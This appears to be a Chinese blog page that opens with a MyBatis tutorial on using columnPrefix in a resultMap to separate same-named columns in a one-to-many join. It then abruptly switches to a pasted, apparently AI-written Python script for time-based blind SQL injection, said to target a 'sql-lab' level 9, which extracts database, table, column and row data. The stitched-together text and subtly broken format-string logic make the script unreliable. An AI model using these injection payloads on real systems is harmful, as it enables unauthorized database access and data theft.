使用columnPrefix别名区分所属哪个类的字段

今天在写一个关联表查询的时候出现的几个问题。

需要查出这个订单的所有状态,属于一对多的关系

//这个为查询的语句
 <select id="selectOrderByMap" parameterType="java.lang.String" resultMap="OrderLinkAudit">
        select
        ord.id,ord.ser_title,ord.org_name,ord.status,audit.content as audit_content,    audit.create_time as audit_create_time,audit.order_id as audit_order_id 
        from ser_order ord
        left join ser_order_audit audit on ord.id = audit.order_id
        <where>
            <if test="_parameter!= null">
                and ord.id = #{_parameter, jdbcType=VARCHAR}
            </if>
        </where>
        order by audit.create_time desc
    </select>


// 订单关联审核记录 
    <resultMap id="OrderLinkAudit" type="com.xx.xx.xx.xx.Order" extends="BaseResultMap">
        <collection property="auditList" columnPrefix="audit_"
                    ofType="com.xx.xx.xx.xx.OrderAudit">
            <id column="id" jdbcType="VARCHAR" property="id"/>
            <result column="order_id" jdbcType="VARCHAR" property="orderId"/>
            <result column="status" jdbcType="INTEGER" property="status"/>
            <result column="user_id" jdbcType="VARCHAR" property="userId"/>
            <result column="user_name" jdbcType="VARCHAR" property="userName"/>
            <result column="content" jdbcType="VARCHAR" property="content"/>
            <result column="create_time" jdbcType="TIMESTAMP" property="createTime"/>
        </collection>
    </resultMap>

不了解resultMap,所以在使用的时候出了差错。

resultMap:适合使用返回值是自定义实体类的情况。

resultType:适合使用返回值得数据类型是非自定义的,即jdk的提供的类型。

在想返回有相同字段content,create_time ,一开始没有用resultMap中定义的别名columnPrefix=”audit_”,导致直接覆盖了,前一个表的相同字段值。
columnPrefix:定义的别名用来区分是哪个类的字段,映射对应的属性,区分他们分别属于哪些类。

当然可以帮你写一个基于时间盲注的Python程序,获取数据库名,表名,列名和数据。以下是示例代码: ```python import requests import string # 数据库名长度 db_name_length = 0 # 数据库名 db_name = '' # 表名列表 table_names = [] # 列名列表 column_names = [] # 数据列表 data_list = [] # SQL注入语句的前缀和后缀 sql_prefix = "1' and if((select ascii(substring(database(),{},1)))={},sleep(3),1)-- -" sql_suffix = '' # 发送请求的函数 def make_request(payload): url = "http://your-ip/sql-lab/my-query" data = { 'query': payload, 'submit': 'Submit Query' } headers = { 'Cookie': 'session=your-session-id' } response = requests.post(url, data=data, headers=headers) return response.elapsed.total_seconds() # 获取数据库名长度 for i in range(1, 100): payload = sql_prefix.format(i, 97) if make_request(payload) >= 3: db_name_length = i break # 获取数据库名 for i in range(1, db_name_length + 1): for j in string.printable: payload = sql_prefix.format(i, ord(j)) if make_request(payload) >= 3: db_name += j break # 获取表名列表 payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 0) if make_request(payload) >= 3: table_count_payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 1) table_count = 0 for i in range(1, 100): payload = table_count_payload.format(i) if make_request(payload) >= 3: table_count = i break for i in range(table_count): table_payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, i, 0) table_name_length = 0 for j in range(1, 100): payload = table_payload.format(j) if make_request(payload) >= 3: table_name_length = j break table_name = '' for j in range(1, table_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, i, ord(k)) if make_request(payload) >= 3: table_name += k break table_names.append(table_name) # 获取列名列表和数据列表 for table_name in table_names: column_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 0) if make_request(column_payload) >= 3: column_count_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 1) column_count = 0 for i in range(1, 100): payload = column_count_payload.format(i) if make_request(payload) >= 3: column_count = i break for i in range(column_count): column_payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, table_name, i, 0) column_name_length = 0 for j in range(1, 100): payload = column_payload.format(j) if make_request(payload) >= 3: column_name_length = j break column_name = '' for j in range(1, column_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, table_name, i, ord(k)) if make_request(payload) >= 3: column_name += k break column_names.append(column_name) data_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 0) if make_request(data_payload) >= 3: data_count_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 1) data_count = 0 for j in range(1, 100): payload = data_count_payload.format(j) if make_request(payload) >= 3: data_count = j break for j in range(data_count): data_item = {} for column_name in column_names: data_payload = "1' and if((select ascii(substring({},1)) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, table_name, j, 0) data_length = 0 for k in range(1, 100): payload = data_payload.format(k) if make_request(payload) >= 3: data_length = k break data_value = '' for k in range(1, data_length + 1): for l in string.printable: payload = "1' and if((select ascii(substring({},{})) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, k, table_name, j, ord(l)) if make_request(payload) >= 3: data_value += l break data_item[column_name] = data_value data_list.append(data_item) # 打印结果 print('Database name: {}'.format(db_name)) print('Table names: {}'.format(table_names)) print('Column names: {}'.format(column_names)) print('Data: {}'.format(data_list)) ``` 需要修改的地方: 1. 将 `your-ip` 替换成 sql-lab 的 IP 地址 2. 将 `your-session-id` 替换成你的 sql-lab 的 session ID 注意:这个程序只适用于 sql-lab 第九关的时间盲注。如果你要用于其他情况,请适当修改代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值